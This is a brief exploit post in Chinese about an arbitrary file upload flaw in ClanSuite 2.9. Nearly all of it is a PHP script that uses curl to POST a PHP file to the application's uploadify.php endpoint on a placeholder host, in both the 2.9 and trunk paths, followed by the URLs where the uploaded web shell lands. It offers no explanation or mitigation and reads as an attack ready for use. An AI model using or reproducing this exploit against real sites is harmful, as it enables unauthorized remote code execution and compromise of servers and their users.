ClanSuite 2.9任意文件上传漏洞

<?php

02 $u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php";

03 $c = curl_init("http://www.xxoo.com/uploads/uploadify.php"); // Version 2.9

04 $c = curl_init("http://www.xxoo.com/application/uploads/uploadify.php"); // Version trunk

05 curl_setopt($c, CURLOPT_POST, true);

06 curl_setopt($c, CURLOPT_POSTFIELDS,

07 array('Filedata'=>"@$u",

08 'name'=>"info.php"));

09 curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);

10 $e = curl_exec($c);

11 curl_close($c);

12 echo $e; 

13 ?>

shell位置:
http://www.xxoo.com/uploads/temps/info.php      
Or: http://www.xxoo.com/application/uploads/temps/info.php